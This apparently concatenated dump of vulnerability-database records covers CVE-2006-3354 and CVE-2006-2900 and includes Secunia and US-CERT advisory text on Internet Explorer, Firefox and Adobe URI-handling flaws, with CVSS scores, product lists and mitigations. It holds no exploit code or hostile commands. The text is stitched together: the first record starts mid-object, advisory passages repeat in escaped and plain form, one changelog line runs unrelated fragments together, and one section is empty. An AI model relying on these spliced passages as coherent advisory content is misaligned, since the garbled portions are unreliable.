"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "H D Moore hdm@metasploit.com",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200607-017"
}
],
"trust": 0.6
},
"cve": "CVE-2006-3354",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "PARTIAL",
"baseScore": 5.0,
"confidentialityImpact": "NONE",
"exploitabilityScore": 10.0,
"impactScore": 2.9,
"integrityImpact": "NONE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "PARTIAL",
"baseScore": 5.0,
"confidentialityImpact": "NONE",
"exploitabilityScore": 10.0,
"id": "VHN-19462",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:N/I:N/A:P",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "NVD",
"id": "CVE-2006-3354",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-200607-017",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "VULHUB",
"id": "VHN-19462",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-19462"
},
{
"db": "NVD",
"id": "CVE-2006-3354"
},
{
"db": "CNNVD",
"id": "CNNVD-200607-017"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Microsoft Internet Explorer 6 allows remote attackers to cause a denial of service (crash) by setting the Filter property of an ADODB.Recordset ActiveX object to certain values multiple times, which triggers a null dereference. Microsoft Internet Explorer is prone to a denial-of-service condition when processing the \u0027ADODB.Recordset Filter Property\u0027 COM object. \nA successful attack may cause the browser to fail due to a null-pointer dereference. Microsoft Internet Explorer is a very popular WEB browser released by Microsoft. When the properties of the ADODB.Recordset ActiveX object are assigned different values \u200b\u200bthree times, the null pointer reference problem will be triggered. If the user is tricked into accessing a malicious WEB page containing malformed ActiveX reference code, it will cause IE to deny service",
"sources": [
{
"db": "NVD",
"id": "CVE-2006-3354"
},
{
"db": "BID",
"id": "18773"
},
{
"db": "VULHUB",
"id": "VHN-19462"
}
],
"trust": 1.26
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://www.scap.org.cn/vuln/vhn-19462",
"trust": 0.1,
"type": "unknown"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-19462"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "BID",
"id": "18773",
"trust": 2.0
},
{
"db": "OSVDB",
"id": "26834",
"trust": 1.7
},
{
"db": "NVD",
"id": "CVE-2006-3354",
"trust": 1.7
},
{
"db": "CNNVD",
"id": "CNNVD-200607-017",
"trust": 0.7
},
{
"db": "EXPLOIT-DB",
"id": "28145",
"trust": 0.1
},
{
"db": "VULHUB",
"id": "VHN-19462",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-19462"
},
{
"db": "BID",
"id": "18773"
},
{
"db": "NVD",
"id": "CVE-2006-3354"
},
{
"db": "CNNVD",
"id": "CNNVD-200607-017"
}
]
},
"id": "VAR-200607-0093",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-19462"
}
],
"trust": 0.01
},
"last_update_date": "2023-12-18T12:47:05.013000Z",
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "NVD-CWE-Other",
"trust": 1.0
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2006-3354"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.0,
"url": "http://browserfun.blogspot.com/2006/07/mobb-1-adodbrecordset-filter-property.html"
},
{
"trust": 1.7,
"url": "http://www.securityfocus.com/bid/18773"
},
{
"trust": 1.7,
"url": "http://www.osvdb.org/26834"
},
{
"trust": 1.7,
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/27596"
},
{
"trust": 0.3,
"url": "http://www.microsoft.com/windows/ie/default.mspx"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-19462"
},
{
"db": "BID",
"id": "18773"
},
{
"db": "NVD",
"id": "CVE-2006-3354"
},
{
"db": "CNNVD",
"id": "CNNVD-200607-017"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULHUB",
"id": "VHN-19462"
},
{
"db": "BID",
"id": "18773"
},
{
"db": "NVD",
"id": "CVE-2006-3354"
},
{
"db": "CNNVD",
"id": "CNNVD-200607-017"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2006-07-06T00:00:00",
"db": "VULHUB",
"id": "VHN-19462"
},
{
"date": "2006-07-03T00:00:00",
"db": "BID",
"id": "18773"
},
{
"date": "2006-07-06T01:05:00",
"db": "NVD",
"id": "CVE-2006-3354"
},
{
"date": "2006-07-05T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200607-017"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-07-20T00:00:00",
"db": "VULHUB",
"id": "VHN-19462"
},
{
"date": "2006-07-04T20:54:00",
"db": "BID",
"id": "18773"
},
{
"date": "2021-07-23T15:04:41.580000",
"db": "NVD",
"id": "CVE-2006-3354"
},
{
"date": "2021-07-27T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200607-017"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200607-017"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Microsoft Internet Explorer ADODB.Recordset Null pointer reference denial of service vulnerability",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200607-017"
}
],
"trust": 0.6
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "other",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200607-017"
}
],
"trust": 0.6
}
}
VAR-200606-0464
Vulnerability from variot - Updated: 2023-12-18 11:05
Internet Explorer 6 allows user-assisted remote attackers to read arbitrary files by tricking a user into typing the characters of the target filename in a text box and using the OnKeyDown, OnKeyPress, and OnKeyUp Javascript keystroke events to change the focus and cause those characters to be inserted into a file upload input control, which can then upload the file when the user submits the form. Mozilla Firefox allows cross-domain access to an iframe. This vulnerability could allow an attacker to interact with a web site in a different domain. The attacker could read content and cookies, capture keystrokes, and modify content. Mozilla Firefox does not filter input when sending certain URIs to registered protocol handlers. This may allow a remote, authenticated attacker to use Firefox as a vector for executing commands on a vulnerable system.
SOLUTION: Disable Active Scripting support.
Do not enter suspicious text when visiting untrusted web sites.
TITLE: Mozilla Firefox Multiple Vulnerabilities
SECUNIA ADVISORY ID: SA26095
VERIFY ADVISORY: http://secunia.com/advisories/26095/
CRITICAL: Highly critical
IMPACT: Cross Site Scripting, Spoofing, DoS, System access
WHERE: From remote
SOFTWARE: Mozilla Firefox 2.0.x http://secunia.com/product/12434/
DESCRIPTION: Some vulnerabilities have been reported in Mozilla Firefox, which can be exploited by malicious people to conduct spoofing and cross-site scripting attacks and potentially to compromise a user's system.
1) Various errors in the browser engine can be exploited to cause memory corruption and potentially to execute arbitrary code.
2) Various errors in the Javascript engine can be exploited to cause memory corruption and potentially to execute arbitrary code.
3) An error in the "addEventListener" and "setTimeout" methods can be exploited to inject script into another site's context, circumventing the browser's same-origin policy.
4) An error in the cross-domain handling can be exploited to inject arbitrary HTML and script code in a sub-frame of another web site.
This is related to vulnerability #5 in: SA21906
5) An unspecified error in the handling of elements outside of documents allows an attacker to call an event handler and execute arbitrary code with chrome privileges.
6) An unspecified error in the handling of "XPCNativeWrapper" can lead to execution of user-supplied code.
SOLUTION: Update to version 2.0.0.5.
PROVIDED AND/OR DISCOVERED BY:
1) The vendor credits Bernd Mielke, Boris Zbarsky, David Baron, Daniel Veditz, Jesse Ruderman, Lukas Loehrer, Martijn Wargers, Mats Palmgren, Olli Pettay, Paul Nickerson, and Vladimir Sukhoy.
2) The vendor credits Asaf Romano, Jesse Ruderman, and Igor Bukanov.
3, 5) The vendor credits moz_bug_r_a4
4) Ronen Zilberman and Michal Zalewski
6) The vendor credits shutdown and moz_bug_r_a4.
ORIGINAL ADVISORY: http://www.mozilla.org/security/announce/2007/mfsa2007-18.html http://www.mozilla.org/security/announce/2007/mfsa2007-19.html http://www.mozilla.org/security/announce/2007/mfsa2007-20.html http://www.mozilla.org/security/announce/2007/mfsa2007-21.html http://www.mozilla.org/security/announce/2007/mfsa2007-25.html
OTHER REFERENCES: SA21906: http://secunia.com/advisories/21906/
The vulnerability is caused due to an error within the handling of "about:blank" pages loaded by chrome in an addon. This can be exploited to execute script code under chrome privileges by e.g. clicking on a link opened in an "about:blank" window created and populated in a certain ways by an addon.
Successful exploitation requires that certain addons are installed. http://www.mozilla.com/en-US/firefox/
Thunderbird: Fixed in the upcoming version 2.0.0.6. http://www.mozilla.com/en-US/thunderbird/
SeaMonkey: Fixed in the upcoming version 1.1.4.
For more information: SA26201
PROVIDED AND/OR DISCOVERED BY: moz_bug_r_a4
CHANGELOG: 2007-07-31: Updated "Description". Added link to vendor advisory. "mailto", "news", "nntp", "snews", "telnet"). using Firefox visits a malicious website with a specially crafted "mailto" URI containing a "%" character and ends in a certain extension (e.g.
The vulnerability is confirmed on a fully patched Windows XP SP2 and Windows Server 2003 SP2 system using Firefox version 2.0.0.5 and Netscape Navigator version 9.0b2. Other versions and browsers may also be affected.
SOLUTION: Do not browse untrusted websites or follow untrusted links.
PROVIDED AND/OR DISCOVERED BY: Vulnerability discovered by: * Billy (BK) Rios
Firefox not escaping quotes originally discussed by: * Jesper Johansson
Additional research by Secunia Research.
National Cyber Alert System
Technical Cyber Security Alert TA07-297B
Adobe Updates for Microsoft Windows URI Vulnerability
Original release date: October 24, 2007
Last revised: --
Source: US-CERT
Systems Affected
Microsoft Windows XP and Windows Server 2003 systems with Internet Explorer 7 and any of the following Adobe products:
* Adobe Reader 8.1 and earlier
* Adobe Acrobat Professional, 3D, and Standard 8.1 and earlier
* Adobe Reader 7.0.9 and earlier
* Adobe Acrobat Professional, 3D, Standard, and Elements 7.0.9 and earlier
Overview
Adobe has released updates for the Adobe Reader and Adobe Acrobat product families. The update addresses a URI handling vulnerability in Microsoft Windows XP and Server 2003 systems with Internet Explorer 7.
I. Description
Installing Microsoft Internet Explorer (IE) 7 on Windows XP or Server 2003 changes the way Windows handles Uniform Resource Identifiers (URIs). This change has introduced a flaw that can cause Windows to incorrectly determine the appropriate handler for the protocol specified in a URI. More information about this vulnerability is available in US-CERT Vulnerability Note VU#403150.
Public reports indicate that this vulnerability is being actively exploited with malicious PDF files. Adobe has released Adobe Reader 8.1.1 and Adobe Acrobat 8.1.1, which mitigate this vulnerability.
II.
III. Solution
Apply an update
Adobe has released Adobe Reader 8.1.1 and Adobe Acrobat 8.1.1 to address this issue. These Adobe products handle URIs in a way that mitigates the vulnerability in Microsoft Windows.
Disable the mailto: URI in Adobe Reader and Adobe Acrobat
If you are unable to install an updated version of the software, this vulnerability can be mitigated by disabling the mailto: URI handler in Adobe Reader and Adobe Acrobat. Please see Adobe Security Bulletin APSB07-18 for details.
Appendix A. Vendor Information
Adobe
For information about updating affected Adobe products, see Adobe Security Bulletin APSB07-18.
Appendix B. References
* Adobe Security Bulletin APSB07-18 - <http://www.adobe.com/support/security/bulletins/apsb07-18.htm>
* Microsoft Security Advisory (943521) - <http://www.microsoft.com/technet/security/advisory/943521.mspx>
* US-CERT Vulnerability Note VU#403150 - <http://www.kb.cert.org/vuls/id/403150>
The most recent version of this document can be found at:
<http://www.us-cert.gov/cas/techalerts/TA07-297B.html>
Feedback can be directed to US-CERT Technical Staff. Please send email to cert@cert.org with "TA07-297B Feedback VU#403150" in the subject.
For instructions on subscribing to or unsubscribing from this mailing list, visit http://www.us-cert.gov/cas/signup.html.
Produced 2007 by US-CERT, a government organization.
Terms of use:
<http://www.us-cert.gov/legal.html>
Revision History
October 24, 2007: Initial release
{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-200606-0464",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": null,
"scope": null,
"trust": 2.4,
"vendor": "mozilla",
"version": null
},
{
"model": "ie",
"scope": "eq",
"trust": 1.0,
"vendor": "microsoft",
"version": "5.01"
},
{
"model": "ie",
"scope": "eq",
"trust": 1.0,
"vendor": "microsoft",
"version": "6"
},
{
"model": "network camera server vb101",
"scope": "eq",
"trust": 1.0,
"vendor": "canon",
"version": "*"
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "adobe",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "microsoft",
"version": null
},
{
"model": "network camera server vb101",
"scope": null,
"trust": 0.6,
"vendor": "canon",
"version": null
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#143297"
},
{
"db": "CERT/CC",
"id": "VU#403150"
},
{
"db": "CERT/CC",
"id": "VU#783400"
},
{
"db": "NVD",
"id": "CVE-2006-2900"
},
{
"db": "CNNVD",
"id": "CNNVD-200606-183"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:microsoft:ie:6:windows_2000_sp4:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:ie:6:windows_server_2003_sp1:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:ie:6:windows_server_2003_sp1_itanium:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:ie:6:windows_xp_sp2:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:canon:network_camera_server_vb101:*:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:ie:5.01:windows_2000_sp4:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:ie:6:*:windows_xp_professional_64bit:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:ie:6:sp1:windows_98:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:ie:6:sp1:windows_millennium:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:ie:6:sp1:windows_98_se:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:ie:6:sp1:windows_xpsp1:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2006-2900"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Secunia",
"sources": [
{
"db": "PACKETSTORM",
"id": "47071"
},
{
"db": "PACKETSTORM",
"id": "57832"
},
{
"db": "PACKETSTORM",
"id": "58191"
},
{
"db": "PACKETSTORM",
"id": "58068"
}
],
"trust": 0.4
},
"cve": "CVE-2006-2900",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "HIGH",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 4.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 4.9,
"impactScore": 4.9,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": true,
"vectorString": "AV:N/AC:H/Au:N/C:P/I:P/A:N",
"version": "2.0"
},
{
"accessComplexity": "HIGH",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "NONE",
"baseScore": 4.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 4.9,
"id": "VHN-19008",
"impactScore": 4.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:H/AU:N/C:P/I:P/A:N",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "NVD",
"id": "CVE-2006-2900",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "CARNEGIE MELLON",
"id": "VU#143297",
"trust": 0.8,
"value": "8.51"
},
{
"author": "CARNEGIE MELLON",
"id": "VU#403150",
"trust": 0.8,
"value": "18.43"
},
{
"author": "CARNEGIE MELLON",
"id": "VU#783400",
"trust": 0.8,
"value": "25.52"
},
{
"author": "CNNVD",
"id": "CNNVD-200606-183",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "VULHUB",
"id": "VHN-19008",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#143297"
},
{
"db": "CERT/CC",
"id": "VU#403150"
},
{
"db": "CERT/CC",
"id": "VU#783400"
},
{
"db": "VULHUB",
"id": "VHN-19008"
},
{
"db": "NVD",
"id": "CVE-2006-2900"
},
{
"db": "CNNVD",
"id": "CNNVD-200606-183"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Internet Explorer 6 allows user-assisted remote attackers to read arbitrary files by tricking a user into typing the characters of the target filename in a text box and using the OnKeyDown, OnKeyPress, and OnKeyUp Javascript keystroke events to change the focus and cause those characters to be inserted into a file upload input control, which can then upload the file when the user submits the form. Mozilla Firefox allows cross-domain access to an iframe. This vulnerability could allow an attacker to interact with a web site in a different domain. The attacker could read content and cookies, capture keystrokes, and modify content. Mozilla Firefox does not filter input when sending certain URIs to registered protocol handlers. This may allow a remote, authenticated attacker to use Firefox as a vector for executing commands on a vulnerable system. \n\n----------------------------------------------------------------------\n\nWant to join the Secunia Security Team?\n\nSecunia offers a position as a security specialist, where your daily\nwork involves reverse engineering of software and exploit code,\nauditing of source code, and analysis of vulnerability reports. \n\nSOLUTION:\nDisable Active Scripting support. \n\nDo not enter suspicious text when visiting untrusted web sites. \n\n----------------------------------------------------------------------\n\nTry a new way to discover vulnerabilities that ALREADY EXIST in your\nIT infrastructure. \n\nThe Full Featured Secunia Network Software Inspector (NSI) is now\navailable:\nhttp://secunia.com/network_software_inspector/\n\nThe Secunia NSI enables you to INSPECT, DISCOVER, and DOCUMENT\nvulnerabilities in more than 4,000 different Windows applications. 
\n\n----------------------------------------------------------------------\n\nTITLE:\nMozilla Firefox Multiple Vulnerabilities\n\nSECUNIA ADVISORY ID:\nSA26095\n\nVERIFY ADVISORY:\nhttp://secunia.com/advisories/26095/\n\nCRITICAL:\nHighly critical\n\nIMPACT:\nCross Site Scripting, Spoofing, DoS, System access\n\nWHERE:\n\u003eFrom remote\n\nSOFTWARE:\nMozilla Firefox 2.0.x\nhttp://secunia.com/product/12434/\n\nDESCRIPTION:\nSome vulnerabilities have been reported in Mozilla Firefox, which can\nbe exploited by malicious people to conduct spoofing and cross-site\nscripting attacks and potentially to compromise a user\u0027s system. \n\n1) Various errors in the browser engine can be exploited to cause\nmemory corruption and potentially to execute arbitrary code. \n\n2) Various errors in the Javascript engine can be exploited to cause\nmemory corruption and potentially to execute arbitrary code. \n\n3) An error in the \"addEventListener\" and \"setTimeout\" methods can be\nexploited to inject script into another site\u0027s context, circumventing\nthe browser\u0027s same-origin policy. \n\n4) An error in the cross-domain handling can be exploited to inject\narbitrary HTML and script code in a sub-frame of another web site. \n\nThis is related to vulnerability #5 in:\nSA21906\n\n5) An unspecified error in the handling of elements outside of\ndocuments allows an attacker to call an event handler and execute\narbitrary code with chrome privileges. \n\n6) An unspecified error in the handling of \"XPCNativeWrapper\" can\nlead to execution of user-supplied code. \n\nSOLUTION:\nUpdate to version 2.0.0.5. \n\nPROVIDED AND/OR DISCOVERED BY:\n1) The vendor credits Bernd Mielke, Boris Zbarsky, David Baron,\nDaniel Veditz, Jesse Ruderman, Lukas Loehrer, Martijn Wargers, Mats\nPalmgren, Olli Pettay, Paul Nickerson, and Vladimir Sukhoy. \n2) The vendor credits Asaf Romano, Jesse Ruderman, and Igor Bukanov. 
\n3, 5) The vendor credits moz_bug_r_a4\n4) Ronen Zilberman and Michal Zalewski\n6) The vendor credits shutdown and moz_bug_r_a4. \n\nORIGINAL ADVISORY:\nhttp://www.mozilla.org/security/announce/2007/mfsa2007-18.html\nhttp://www.mozilla.org/security/announce/2007/mfsa2007-19.html\nhttp://www.mozilla.org/security/announce/2007/mfsa2007-20.html\nhttp://www.mozilla.org/security/announce/2007/mfsa2007-21.html\nhttp://www.mozilla.org/security/announce/2007/mfsa2007-25.html\n\nOTHER REFERENCES:\nSA21906:\nhttp://secunia.com/advisories/21906/\n\n----------------------------------------------------------------------\n\nThe vulnerability is caused due to an error within the handling of\n\"about:blank\" pages loaded by chrome in an addon. 
This can be\nexploited to execute script code under chrome privileges by e.g. \nclicking on a link opened in an \"about:blank\" window created and\npopulated in a certain ways by an addon. \n\nSuccessful exploitation requires that certain addons are installed. \nhttp://www.mozilla.com/en-US/firefox/\n\nThunderbird:\nFixed in the upcoming version 2.0.0.6. \nhttp://www.mozilla.com/en-US/thunderbird/\n\nSeaMonkey:\nFixed in the upcoming version 1.1.4. \n\nFor more information:\nSA26201\n\nPROVIDED AND/OR DISCOVERED BY:\nmoz_bug_r_a4\n\nCHANGELOG:\n2007-07-31: Updated \"Description\". Added link to vendor advisory. \"mailto\", \"news\", \"nntp\", \"snews\", \"telnet\"). using\nFirefox visits a malicious website with a specially crafted \"mailto\"\nURI containing a \"%\" character and ends in a certain extension (e.g. \n\nThe vulnerability is confirmed on a fully patched Windows XP SP2 and\nWindows Server 2003 SP2 system using Firefox version 2.0.0.5 and\nNetscape Navigator version 9.0b2. Other versions and browsers may\nalso be affected. \n\nSOLUTION:\nDo not browse untrusted websites or follow untrusted links. \n\nPROVIDED AND/OR DISCOVERED BY:\nVulnerability discovered by:\n* Billy (BK) Rios\n\nFirefox not escaping quotes originally discussed by:\n* Jesper Johansson\n\nAdditional research by Secunia Research. 
\n-----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n\tNational Cyber Alert System\n Technical Cyber Security Alert TA07-297B\n\n\nAdobe Updates for Microsoft Windows URI Vulnerability\n\n Original release date: October 24, 2007\n Last revised: --\n Source: US-CERT\n\nSystems Affected\n\n Microsoft Windows XP and Windows Server 2003 systems with Internet\n Explorer 7 and any of the following Adobe products:\n * Adobe Reader 8.1 and earlier\n * Adobe Acrobat Professional, 3D, and Standard 8.1 and earlier\n * Adobe Reader 7.0.9 and earlier\n * Adobe Acrobat Professional, 3D, Standard, and Elements 7.0.9 and\n earlier\n\nOverview\n\n Adobe has released updates for the Adobe Reader and Adobe Acrobat\n product families. The update addresses a URI handling vulnerability in\n Microsoft Windows XP and Server 2003 systems with Internet Explorer 7. \n\nI. Description\n\n Installing Microsoft Internet Explorer (IE) 7 on Windows XP or Server\n 2003 changes the way Windows handles Uniform Resource Identifiers\n (URIs). This change has introduced a flaw that can cause Windows to\n incorrectly determine the appropriate handler for the protocol\n specified in a URI. More information about this vulnerability is available in\n US-CERT Vulnerability Note VU#403150. \n\n Public reports indicate that this vulnerability is being actively\n exploited with malicious PDF files. Adobe has released Adobe Reader\n 8.1.1 and Adobe Acrobat 8.1.1, which mitigate this vulnerability. \n\nII. \n\nIII. Solution\n\nApply an update\n\n Adobe has released Adobe Reader 8.1.1 and Adobe Acrobat 8.1.1 to\n address this issue. These Adobe products handle URIs in a way that\n mitigates the vulnerability in Microsoft Windows. \n\nDisable the mailto: URI in Adobe Reader and Adobe Acrobat\n\n If you are unable to install an updated version of the software, this\n vulnerability can be mitigated by disabling the mailto: URI handler in\n Adobe Reader and Adobe Acrobat. 
